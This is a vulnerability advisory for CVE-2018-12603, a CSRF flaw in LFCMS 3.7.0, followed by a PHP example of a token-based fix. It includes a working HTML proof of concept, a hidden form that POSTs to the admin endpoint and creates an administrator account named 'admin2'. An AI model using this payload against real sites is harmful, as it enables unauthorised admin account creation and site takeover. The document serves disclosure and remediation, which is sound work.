CVE-2018-12603:LFCMS_3.7.0
CVE-2018-12603
> [Discoverer]
> Bay0net from JZXTSEC
> [Suggested description]
> A CSRF vulnerability exists in LFCMS 3.7.0: an administrator account can be added arbitrarily.
>
> ------------------------------------------
>
> [Vulnerability Type]
> Cross Site Request Forgery (CSRF)
>
> ------------------------------------------
>
> [Affected Product Code Base]
> LFCMS - 3.7.0
>
> ------------------------------------------
>
> [Affected Component]
> While an administrator is logged in, opening the following page adds a user.
> https://www.cnblogs.com/v1vvwv/p/9203899.html
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Escalation of Privileges]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> Affected component
>
> ------------------------------------------
>
> [Reference]
> https://www.cnblogs.com/v1vvwv/p/9203899.html
> http://www.lfdycms.com/home/down/index/id/26.html
>
> ------------------------------------------
>
A CSRF vulnerability exists in LFCMS 3.7.0: an administrator account can be added arbitrarily.
While an administrator is logged in, opening the following page adds an administrator account (the hidden form auto-submits a POST to the admin "add member" endpoint using the victim's session cookie):
```html
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://10.211.55.17/lfdycms3.7.0/admin.php?s=/Member/add.html" method="POST">
      <input type="hidden" name="username" value="admin2" />
      <input type="hidden" name="password" value="admin2" />
      <input type="hidden" name="repassword" value="admin2" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
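The root cause is that the add-member handler accepts any POST that carries a valid admin session cookie, with nothing tying the request to a page the application itself served. The following is an added example (not LFCMS code) of the standard fix, a per-session synchronizer token validated with a constant-time compare, plus two defence-in-depth checks: an Origin header comparison and a SameSite=Lax session cookie, which on its own already stops the cross-site top-level POST the PoC above relies on. The route `admin.php?s=/Member/add.html`, the field names and the `_csrf` parameter are assumptions chosen to mirror the PoC form.

```php
<?php
// Added example, not part of LFCMS: CSRF protection for a state-changing
// admin action. Route and field names are assumptions mirroring the PoC.
declare(strict_types=1);

// Defence in depth: SameSite=Lax keeps the session cookie off cross-site
// form POSTs (PHP 7.3+ array form of session_set_cookie_params).
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();

/** Return the session's CSRF token, creating it on first use. */
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Hidden input to embed in every form that changes server state. */
function csrf_field(): string
{
    return '<input type="hidden" name="_csrf" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

/**
 * Accept the request only if it is a POST, the submitted token equals the
 * session token (hash_equals avoids timing leaks), and, when the browser
 * sent an Origin header, its host is our own host.
 */
function csrf_request_is_valid(array $post, array $server): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    $sent = $post['_csrf'] ?? '';
    if (!is_string($sent) || $sent === '' || !hash_equals(csrf_token(), $sent)) {
        return false;
    }
    if (isset($server['HTTP_ORIGIN'])) {
        // A form submitted from an attacker's page carries the attacker's Origin.
        $originHost = parse_url($server['HTTP_ORIGIN'], PHP_URL_HOST);
        $ownHost = strtolower(explode(':', $server['HTTP_HOST'] ?? '', 2)[0]);
        if (!is_string($originHost) || strtolower($originHost) !== $ownHost) {
            return false;
        }
    }
    return true;
}

// Handler for the assumed admin.php?s=/Member/add.html route.
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    if (!csrf_request_is_valid($_POST, $_SERVER)) {
        http_response_code(403);
        exit('Rejected: missing or invalid CSRF token');
    }
    // ... authorisation check and member creation go here (assumed app logic) ...
    exit('Member created');
}
?>
<!-- On GET, render the form with the token embedded so only pages we served can submit it. -->
<form method="POST" action="admin.php?s=/Member/add.html">
  <?= csrf_field() ?>
  <input name="username">
  <input type="password" name="password">
  <input type="password" name="repassword">
  <button type="submit">Add</button>
</form>
```

With this in place the PoC form fails at the first check: it cannot read the victim's session token, so its POST arrives without a valid `_csrf` value and is refused with 403 before any member is created. The token is kept per session rather than per request so that multiple admin tabs do not invalidate each other; rotate it on login to avoid session-fixation style reuse.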
References:
http://www.lfdycms.com/
http://www.lfdycms.com/home/lists/index/id/60.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12603